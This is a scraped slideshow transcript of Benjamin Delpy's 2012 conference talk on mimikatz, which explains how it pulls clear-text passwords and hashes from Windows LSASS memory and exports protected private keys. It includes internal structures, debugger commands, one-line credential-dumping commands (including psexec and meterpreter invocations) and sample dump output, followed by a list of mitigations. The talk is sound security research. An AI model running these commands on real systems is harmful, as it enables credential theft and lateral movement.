mimikatz n.
Download
Skip this Video
Loading SlideShow in 5 Seconds..
mimikatz PowerPoint Presentation
Download Presentation
mimikatz

Loading in 2 Seconds...

play fullscreen
1 / 57

mimikatz - PowerPoint PPT Presentation


  • 125 Views
  • Uploaded on

mimikatz. Benjamin DELPY ` gentilkiwi ` focus on sekurlsa /pass-the-pass and crypto patches. Who ? Why ?. Benjamin DELPY ` gentilkiwi ` French 26y Kiwi addict Lazy programmer Started to code mimikatz to : explain security concepts ; improve my knowledge ;

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'mimikatz' - konane


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
mimikatz

mimikatz

Benjamin DELPY `gentilkiwi`

focus on sekurlsa/pass-the-pass

and crypto patches

who why
Who ? Why ?
  • Benjamin DELPY `gentilkiwi`
    • French
    • 26y
    • Kiwi addict
    • Lazy programmer
  • Started to code mimikatzto :
    • explain security concepts ;
    • improve my knowledge ;
    • prove to Microsoft that sometimes they must change old habits.
  • Why all in French ?
    • because I’m 
    • It limits script kiddies usage
    • Hack with class

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz working
mimikatzworking
  • On XP, 2003, Vista, 2008, Seven, 2008r2, 8, Server 8
    • x86 & x64
    • 2000 support dropped with mimikatz 1.0
  • Everywhere ; it’s statically compiled
  • Two modes
    • direct action (local commands) – process or driver communication

KeyIso

« Isolation de clé CNG »

LSASS.EXE

EventLog

« Journal d’événements Windows »

SVCHOST.EXE

SamSS

«  Gestionnaire de comptes de sécurité »

LSASS.EXE

Direct action :

crypto::patchcng

VirtualAllocEx, WriteProcessMemory, CreateRemoteThread...

Direct action :

divers::eventdrop

mimikatz.exe

mimikatz.exe

sekurlsa.dll

Open a pipe

Write a welcome message

Wait commands… and return results

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz architecture of sekurlsa crypto
mimikatzarchitecture of sekurlsa & crypto

mimikatz.exe

mod_mimikatz_standard

mod_parseur

mod_mimikatz_winmine

mod_text

mod_cryptoapi

mod_mimikatz_divers

mod_memory

mimikatz.sys

mod_mimikatz_nogpo

mod_secacl

mod_mimikatz_crypto

mod_crypto

mod_mimikatz_impersonate

mod_mimikatz_inject

kappfree.dll

mod_pipe

mod_cryptoacng

mod_mimikatz_samdump

mod_inject

mod_mimikatz_handle

kelloworld.dll

mod_hive

mod_mimikatz_privilege

mod_patch

sam

msv_1_0

mod_mimikatz_system

mod_privilege

klock.dll

secrets

tspkg

mod_mimikatz_service

mod_system

msv_1_0

wdigest

mod_mimikatz_sekurlsa

mod_service

sekurlsa.dll

tspkg

livessp

mod_mimikatz_process

mod_process

wdigest

kerberos

mod_mimikatz_thread

mod_thread

livessp

mod_mimikatz_terminalserver

mod_ts

kerberos

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa what is it
mimikatz :: sekurlsawhat is it ?

mod_mimikatz_sekurlsa

  • A module replacement for my previous favorite library !
  • A local module that can read data from the SamSS Service (well known LSASS process)
  • What sekurlsa module can dump :
    • MSV1_0 hashes
    • TsPkg passwords
    • Wdigest passwords
    • LiveSSP passwords
    • Kerberos passwords (!)
    • …?

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa how lsa works level
mimikatz :: sekurlsahow LSA works ( level)

PLAYSKOOL

Authentication

msv1_0

kerberos

SAM

LsaSS

WinLogon

user:domain:password

Authentication Packages

msv1_0

Challenge

Response

tspkg

wdigest

livessp

kerberos

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa how lsa works level1
mimikatz :: sekurlsahow LSA works ( level)

PLAYSKOOL

  • Authentication packages :
    • take user’s credentials from the logon
    • make their own stuff
    • keep enough data in memory to compute responses of challenges (Single Sign On)
  • If we can get data, and inject it in another session of LSASS, we avoid authentication part
  • This is the principle of « Pass-the-hash »
    • In fact, of « Pass-the-x »

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa history of pass the 1 2
mimikatz :: sekurlsahistory of « pass-the-* » 1/2
  • Pass-the-hash
    • 1997 - Unix modified SAMBA client for Hashes usage ; Paul Ashton (EIGEN)
    • 2000 - Private version of a Windows « LSA Logon Session Editor » ; Hernan Ochoa (CoreSecurity)
    • 2007 - TechEd @ Microsoft ; Marc Murray (TrueSec) present msvctl, and provide some downloads of it 
    • 2007 - « Pass the hash toolkit » published ; Hernan Ochoa (CoreSecurity)
    • 2007 - mimikatz 0.1 includes pass the hash and is publicly available for x86 & x64 versions of Windows (yeah, by myself but in French; so not famous ;))

2007 was the year of pass the hash !

  • Pass-the-ticket
    • 04/2011 - wce(pass the hash toolkit evolution) provides Kerberos ticket support; Hernan Ochoa (Ampliasecurity)

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa history of pass the 2 2
mimikatz :: sekurlsahistory of « pass-the-* » 2/2
  • Pass-the-pass
    • 05/2011 – mimikatz 1.0 dumps first clear text passwords from TsPkg provider (but limited to NT 6 and some XP SP3)
      • http://blog.gentilkiwi.com/securite/pass-the-pass
    • 05/2011 – return of mimikatz ; it dumps clear text passwords from WDigest provider (unlimited this time ;))
      • http://blog.gentilkiwi.com/securite/re-pass-the-pass
    • 05/2011 – Some organizations opened cases to Microsoft about it…

…Lots of time…

    • begin of 2012 - Lots of blogs (and Kevin Mitnick ;)) say few words about mimikatz
    • 03/2012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wcesupport WDigestpassword extract…
      • http://seclists.org/pen-test/2012/Mar/7
    • 03/2012 – mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
      • http://blog.gentilkiwi.com/securite/rere-pass-the-pass
    • 03/2012 – yeah, once again…, more curious but Kerberos keeps passwords in memory
      • http://blog.gentilkiwi.com/securite/rerere-pass-the-pass
    • 08/2012 – sekurlsa module without injection at all ! (ultra safe)
      • http://blog.gentilkiwi.com/securite/mimikatz/sekurlsa-fait-son-apparition

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg
mimikatz :: sekurlsa :: tspkg
  • because sometimes hash is not enough…

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg what is it
mimikatz :: sekurlsa :: tspkgwhat is it ?
  • Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkopusers’s experience
    • http://technet.microsoft.com/library/cc772108.aspx
  • Rely on CredSSPwith Credentials Delegation (!= Account delegation)
    • Specs : http://download.microsoft.com/download/9/5/e/95ef66af-9026-4bb0-a41d-a4f81802d92c/%5Bms-cssp%5D.pdf
  • First impression : it seems cool 
    • User does not have to type its password
    • Password is not in RDP file
    • Password is not in user secrets

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg questions
mimikatz :: sekurlsa :: tspkgquestions ?
  • KB says that for it works, we must enable « Default credentials » delegation
    • “Default credentials : The credentials obtained when the user first logs on to Windows” - https://msdn.microsoft.com/library/bb204773.aspx
      • What ? Our User/Domain/{Password | Hash | Ticket} ? It seems …
        • In all cases, system seems to be vulnerable to pass-the-*…
  • In what form ?

Our specs : [MS-CSSP]

    • 2.2.1.2.1 TSPasswordCreds
      • The TSPasswordCredsstructure contains the user's password credentials that are delegated to the server. (or PIN)

TSPasswordCreds ::= SEQUENCE {

domainName [0] OCTET STRING,

userName [1] OCTET STRING,

password[2] OCTET STRING

}

    • Challenge / response for authentication ?
      • Serveur : YES (TLS / Kerberos)
      • Client : NO ; *password* is sent to server…
  • So password resides somewhere in memory ?

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg symbols theory
mimikatz :: sekurlsa :: tspkgsymbols & theory
  • Let’s explore some symbols !
    • sounds cool… (thanks Microsoft)
  • Let’s imagine a scenario
    • Enumerate all sessions to obtain :
      • Username
      • Domain
      • LUID
    • Call tspkg!TSCredTableLocateDefaultCreds(rely on RtlLookupElementGenericTableAvl) with LUID to obtain :
      • TS_CREDENTIAL
    • Call tspkg!TSObtainClearCreds(rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for :
      • TS_PRIMARY_CREDENTIAL with clear text credentials…

kd> x tspkg!*clear*

75016d1c tspkg!TSObtainClearCreds = <no type information>

kd> x tspkg!*password*

75011b68 tspkg!TSDuplicatePassword = <no type information>

75011cd4 tspkg!TSHidePassword = <no type information>

750195ee tspkg!TSRevealPassword = <no type information>

75012fbd tspkg!TSUpdateCredentialsPassword = <no type information>

kd> x tspkg!*locate*

7501158b tspkg!TSCredTableLocateDefaultCreds = <no type information>

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg workflow
mimikatz :: sekurlsa :: tspkgworkflow

LsaEnumerateLogonSessions

typedefstruct _KIWI_TS_CREDENTIAL {

#ifdef _M_X64

BYTE unk0[108];

#elif defined _M_IX86

BYTE unk0[64];

#endif

LUID LocallyUniqueIdentifier;

PVOID unk1;

PVOID unk2;

PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary;

} KIWI_TS_CREDENTIAL, *PKIWI_TS_CREDENTIAL;

for each LUID

KIWI_TS_CREDENTIAL

tspkg!TSGlobalCredTable

  • typedefstruct _KIWI_TS_PRIMARY_CREDENTIAL {
    • PVOID unk0;
    • LSA_UNICODE_STRING Domaine;
    • LSA_UNICODE_STRING UserName;
    • LSA_UNICODE_STRING Password;
  • } KIWI_TS_PRIMARY_CREDENTIAL, *PKIWI_TS_PRIMARY_CREDENTIAL;

RtlLookupElementGenericTableAvl

KIWI_TS_CREDENTIAL

KIWI_TS_PRIMARY_CREDENTIAL

LsaUnprotectMemory

password in clear !

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa tspkg demo time
mimikatz :: sekurlsa :: tspkgdemo time !
  • sekurlsa::tspkg

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest
mimikatz :: sekurlsa :: wdigest
  • because clear text password over http/https is not cool

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest what is it
mimikatz :: sekurlsa :: wdigestwhat is it ?
  • “Digest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a user's web browser. It applies a hash function to a password before sending it over the network […]”

Wikipedia : http://en.wikipedia.org/wiki/Digest_access_authentication

  • “Common Digest Authentication Scenarios :
    • Authenticated client access to a Web site
    • Authenticated client access using SASL
    • Authenticated client access with integrity protection to a directory service using LDAP”

Microsoft : http://technet.microsoft.com/library/cc778868.aspx

  • Again, it seems cool 
    • No password over the network, just hashes
    • No reversible password in Active Directory ; hashes for each realm
      • Only with Advanced Digest authentication

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest what is it1
mimikatz :: sekurlsa :: wdigestwhat is it ?
  • We speak about hashes, but what hashes ?

H = MD5(HA1:nonce:[…]:HA2)

      • HA1 = MD5(username:realm:password)
      • HA2 = MD5(method:digestURI:[…])
  • Even after login, HA1 may change… realm is from server side and cannot be determined before Windows logon
  • WDigestprovider must have elements to compute responses for different servers :
    • Username
    • Realm (from server)
    • Password

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest theory
mimikatz :: sekurlsa :: wdigesttheory
  • This time, we know :
    • that WDigestkeeps password in memory « by protocol » for HA1digest
    • that LSASS love to unprotect password with LsaUnprotectMemory(so protect with LsaProtectMemory)
  • LsaUnprotectMemory
    • At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
    • Let’s perform a research in WDigest:
    • Hypothesis seems verified 
  • LsaProtectMemory
    • At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
    • Let’s perform a research in WDigest :
    • SpAcceptCredentials takes clear password in args
      • Protect it with LsaProtectMemory
      • Update or insert data in double linked list : wdigest!l_LogSessList

.text:7409D151 _DigestCalcHA1@8 call dwordptr [eax+0B4h]

.text:74096C69 _SpAcceptCredentials@16 call dwordptr [eax+0B0h]

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest workflow
mimikatz :: sekurlsa :: wdigestworkflow

LsaEnumerateLogonSessions

  • typedefstruct _KIWI_WDIGEST_LIST_ENTRY {
    • struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    • struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    • DWORD UsageCount;
    • struct _KIWI_WDIGEST_LIST_ENTRY *This;
    • LUID LocallyUniqueIdentifier;
    • […]
    • LSA_UNICODE_STRING UserName;
    • LSA_UNICODE_STRING Domaine;
    • LSA_UNICODE_STRING Password;
    • […]
  • } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;

for each LUID

wdigest!l_LogSessList

search linked list for LUID

KIWI_WDIGEST_LIST_ENTRY

LsaUnprotectMemory

password in clear !

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa wdigest demo time
mimikatz :: sekurlsa :: wdigestdemo time !
  • sekurlsa::wdigest

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa livessp
mimikatz :: sekurlsa :: livessp
  • because Microsoft was too good in closed networks

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa livessp how
mimikatz :: sekurlsa :: livessphow
  • Actually I’ve only used logical (empirical) approach to search passwords… :
    • Protocol reading
    • Symbols searching

~ Boring~… be more brutal this time : make a WinDBG trap !

0: kd> !process 0 0 lsass.exe

PROCESS 83569040SessionId: 0 Cid: 0224 Peb: 7f43f000 ParentCid: 01b4

DirBase: 5df58100 ObjectTable: 80ce4740 HandleCount: <Data Not Accessible>

Image: lsass.exe

0: kd> .process /i83569040

You need to continue execution (press 'g' <enter>) for the context

to be switched. When the debugger breaks in again, you will be in

the new process context.

0: kd> g

Break instruction exception - code 80000003 (first chance)

nt!RtlpBreakWithStatusInstruction:

814b39d0 cc int 3

0: kd> .reload /user

Loading User Symbols

............................................................

0: kd> bp /p @$proclsasrv!LsaProtectMemory "kc 5 ; g"

0: kd> g

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa livessp how1
mimikatz :: sekurlsa :: livessphow
  • Let’s login with a Live account on Windows 8 !
  • After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)

lsasrv!LsaProtectMemory

livessp!LiveMakeSupplementalCred

livessp!LiveMakeSecPkgCredentials

livessp!LsaApLogonUserEx2

livessp!SpiLogonUserEx2

lsasrv!LsaProtectMemory

msv1_0!NlpAddPrimaryCredential

msv1_0!SspAcceptCredentials

msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory

tspkg!TSHidePassword

tspkg!SpAcceptCredentials

Our LiveSSP provider

Yeah, Pass the Hash capability with Live account too…

Live user can logon through RDP via SSO

1: kd> uf /c livessp!LsaApLogonUserEx2

livessp!LsaApLogonUserEx2 (74781536)

[...]

livessp!LsaApLogonUserEx2+0x560 (74781a96):

call to livessp!LiveCreateLogonSession (74784867)

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa livessp workflow
mimikatz :: sekurlsa :: livesspworkflow

LsaEnumerateLogonSessions

  • typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    • struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    • struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    • PVOID unk0;
    • PVOID unk1;
    • PVOID unk2;
    • PVOID unk3;
    • DWORD unk4;
    • DWORD unk5;
    • PVOID unk6;
    • LUID LocallyUniqueIdentifier;
    • LSA_UNICODE_STRING UserName;
    • PVOID unk7;
    • PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
  • } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

for each LUID

livessp!LiveGlobalLogonSessionList

search linked list for LUID

KIWI_LIVESSP_LIST_ENTRY

  • typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    • DWORD isSupp;
    • DWORD unk0;
    • LSA_UNICODE_STRING UserName;
    • LSA_UNICODE_STRING Domaine;
    • LSA_UNICODE_STRING Password;
  • } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

KIWI_LIVESSP_PRIMARY_CREDENTIAL

LsaUnprotectMemory

password in clear !

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa
mimikatz :: sekurlsa
  • Even if we already have tools for normal accounts, are you not curious to test one with this trap ?*

* Me, yes

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa kerberos
mimikatz :: sekurlsa :: kerberos
  • Let’s login normal account
  • After credentials protection, KerbCreateLogonSessioncalls :
    • NT6 ; KerbInsertOrLocateLogonSession to insert data in KerbGlobalLogonSessionTable
    • NT5 ; KerbInsertLogonSessionto insert data in KerbLogonSessionList

lsasrv!LsaProtectMemory

kerberos!KerbHideKey

kerberos!KerbCreatePrimaryCredentials

kerberos!KerbCreateLogonSession

kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory

kerberos!KerbHidePassword

kerberos!KerbCreateLogonSession

kerberos!SpAcceptCredentials

lsasrv!LsaProtectMemory

msv1_0!NlpAddPrimaryCredential

msv1_0!SspAcceptCredentials

msv1_0!SpAcceptCredentials

lsasrv!LsaProtectMemory

wdigest!SpAcceptCredentials

lsasrv!LsaProtectMemory

tspkg!TSHidePassword

tspkg!SpAcceptCredentials

Kerberos, ticket part ? Maybe ;)

Kerberos part for password ??????

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa kerberos nt6 workflow
mimikatz :: sekurlsa :: kerberos (nt6)workflow

LsaEnumerateLogonSessions

for each LUID

typedefstruct _KIWI_KERBEROS_PRIMARY_CREDENTIAL

{

DWORD unk0;

PVOID unk1;

PVOID unk2;

PVOID unk3;

#ifdef _M_X64

BYTE unk4[32];

#elif defined _M_IX86

BYTE unk4[20];

#endif

LUID LocallyUniqueIdentifier;

#ifdef _M_X64

BYTE unk5[44];

#elif defined _M_IX86

BYTE unk5[36];

#endif

LSA_UNICODE_STRING UserName;

LSA_UNICODE_STRING Domaine;

LSA_UNICODE_STRING Password;

} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;

Kerberos!KerbGlobalLogonSessionTable

KIWI_KERBEROS_PRIMARY_CREDENTIAL

RtlLookupElementGenericTableAvl

KIWI_KERBEROS_PRIMARY_CREDENTIAL

LsaUnprotectMemory

password in clear !

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa kerberos nt5 workflow
mimikatz :: sekurlsa :: kerberos (nt5)workflow

LsaEnumerateLogonSessions

  • typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    • struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    • struct _KIWI_KERBEROS_LOGON_SESSION *Blink; DWORD UsageCount;
    • PVOID unk0;
    • PVOID unk1;
    • PVOID unk2;
    • DWORD unk3;
    • DWORD unk4;
    • PVOID unk5;
    • PVOID unk6;
    • PVOID unk7;
    • LUID LocallyUniqueIdentifier;
  • #ifdef _M_IX86
    • DWORD unk8;
  • #endif
    • DWORD unk9;
    • DWORD unk10;
    • PVOID unk11;
    • DWORD unk12;
    • DWORD unk13;
    • PVOID unk14;
    • PVOID unk15;
    • PVOID unk16;
    • […]
    • LSA_UNICODE_STRING UserName;
    • LSA_UNICODE_STRING Domaine;
    • LSA_UNICODE_STRING Password;
  • } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;

for each LUID

kerberos!KerbLogonSessionList

search linked list for LUID

KIWI_LIVESSP_PRIMARY_CREDENTIAL

LsaUnprotectMemory

password in clear !

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa demo time
mimikatz :: sekurlsademo time !
  • Final sekurlsademosekurlsa::logonPasswords full

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa kerberos hu
mimikatz :: sekurlsa :: kerberos“hu?”
  • Ok It works…*

But why ?

    • Not at all logon on NT5 (can need an unlock)
  • From my understanding of Microsoft explanations
    • no need of passwords for the Kerberos protocol…
    • all is based on the hash (not very sexy too)
  • Microsoft’s implementation of Kerberos is full of logical…
    • For password auth :
      • password hash for shared secret, but keeping password in memory
    • For full smartcard auth :
      • No password on client
      • No hash on client ?
        • NTLM hash on client…
        • KDC sent it back as a gift

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa1
mimikatz :: sekurlsa
  • All passwords in memory are encrypted, but in a reversible way to be used
  • We used LsaUnprotecMemory, in the LSASS context, to decrypt them
    • This function rely on LsaEncryptMemoryfrom lsasrv.dll
  • For that, we previously inject a DLL (sekurlsa.dll) in the LSASS process to take benefits of its keys when we called it
  • Can it be fun to decrypt outside the process ?
    • Yes, it is… no more injection, just reading memory of LSASS process…
  • mimikatz can use lsasrv.dll too and “imports” LSASS initialized keys 
    • When we call LsaEncryptMemory in mimikatz, with all keys imported from LSASS, we have the same comportments than when we are in LSASS !

LsaUnprotectMemory

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa lsaencryptmemory nt5
mimikatz :: sekurlsaLsaEncryptMemoryNT5
  • Depending on the size of the secret, LsaEncryptMemoryuse :
    • RC4
    • DESx

g_cbRandomKey

DWORD ; 256

lsasrv

lsass

g_pRandomKey

@BYTE[g_cbRandomKey]

mimikatz

lsasrv

BYTE[g_cbRandomKey]

copy…

g_pDESXKey

@BYTE[144]

lsasrv

lsass

BYTE[144]

BYTE[8]

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa lsaencryptmemory nt6
mimikatz :: sekurlsaLsaEncryptMemoryNT6
  • Depending on the size of the secret, LsaEncryptMemoryuse :
    • 3DES
    • AES

BYTE[16]

lsasrv

lsass

typedefstruct _KIWI_BCRYPT_KEY_DATA {

DWORD size;

DWORD tag;

DWORD type;

DWORD unk0;

DWORD unk1;

DWORD unk2;

DWORD unk3;

PVOID unk4;

BYTE data; /* etc... */

} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

h3DesKey

mimikatz

lsasrv

copy…

lsasrv

lsass

typedefstruct _KIWI_BCRYPT_KEY {

DWORD size;

DWORD type;

PVOID unk0;

PKIWI_BCRYPT_KEY_DATA cle;

PVOID unk1;

} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

hAesKey

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa memo
mimikatz :: sekurlsamemo
  • Security Packages
  • Protection Keys

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa memo1
mimikatz :: sekurlsamemo
  • Some commands :
    • mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
    • psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
    • meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */

// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug

Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870

Package d'authentification  : NTLM

Utilisateur principal       : Gentil Kiwi

Domaine d'authentification  : vm-w8-rp-x

 msv1_0 :

         * Utilisateur  : Gentil Kiwi

         * Domaine      : vm-w8-rp-x

         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b

         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a

kerberos :

         * Utilisateur  : Gentil Kiwi

         * Domaine      : vm-w8-rp-x

         * Mot de passe : waza1234/

wdigest :

         * Utilisateur  : Gentil Kiwi

         * Domaine      : vm-w8-rp-x

         * Mot de passe : waza1234/

tspkg :

         * Utilisateur  : Gentil Kiwi

         * Domaine      : vm-w8-rp-x

         * Mot de passe : waza1234/

livessp :       n.t. (LUID KO)

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz sekurlsa what we can do
mimikatz :: sekurlsawhat we can do ?
  • Basics
    • No physical access to computer (first step to pass the hash, then pass the pass)
    • No admin rights / system rights / debug privileges (…)
    • Disable local admin accounts
    • Strong passwords (haha, it was a joke ; so useless !!!)
    • For privileged account, network login instead of interactive (when possible)
    • Audit ; pass the hash keeps traces and can lock accounts
    • No admin rights / system rights / debug privileges, even VIP
    • Use separated network (or forest) for privileged tasks
  • More in depth
    • Force strong authentication (SmartCard & Token) : $ / €
    • Short validity for Kerberos tickets
    • No delegation
    • Disable NTLM (available with NT6)
    • No exotic :
      • biometrics (it keeps password somewhere and push it to Windows)
      • single sign on
    • Stop shared secrets for authentication : push Public / Private stuff (like keys ;))
    • Let opportunities to stop retro compatibility
    • Disable faulty providers ?
      • Is it supported by Microsoft ?
      • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0 ?

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto what is it
mimikatz :: cryptowhat is it ?

mod_mimikatz_crypto

  • A little module that I wrote to :
    • play with Windows Cryptographic API / CNG and RSA keys
    • automate export of certificates/keys
      • Even those which are “not” exportable 
  • What cryptomodule can do :
    • List
      • Providers
      • Stores
      • Certificates
      • Keys
    • Export
      • Certificates
        • public in DER format
        • with private keys in PFX format
      • Private keys in PVK format
        • it’s cool, OpenSSL can deal with it too 
    • Patch
      • CryptoAPIin mimikatz context
      • CNG in LSASS context (again !)

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto how it s protected
mimikatz :: cryptohow it’s protected
  • Private keys are DPAPI protected
    • You cannot reuse private key files on another computer
      • At least without the master keys and/or password of users
  • Computer/User can load their own keys because they have enough secrets to do it (ex : session opened)
    • Yes, a computer/server open a “session”
  • Export/Usage can be limited by :
    • Password
    • Popup
    • Export/Archive flag no present

Constraint for most user

Unavailable for computer keys

certutil-importpfxmycert.p12 NoExport

certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto capi how it works
mimikatz :: crypto :: capihow it works
  • “Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardware.”
    • http://technet.microsoft.com/library/cc962093.aspx
  • Processes (mimikatz, IIS, Active Directory , Internet Explorer, yourappshere…) load some DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
    • cryptdll.dll, rsaenh.dll, …
  • Process deal with cryptographic keys by this API…

Benjamin DELPY `gentilkiwi` @ ASFWS 2012 - benjamin@gentilkiwi.com ; blog.gentilkiwi.com

mimikatz crypto capi how it s exported level
mimikatz :: crypto :: capihow it’s exported ( level)

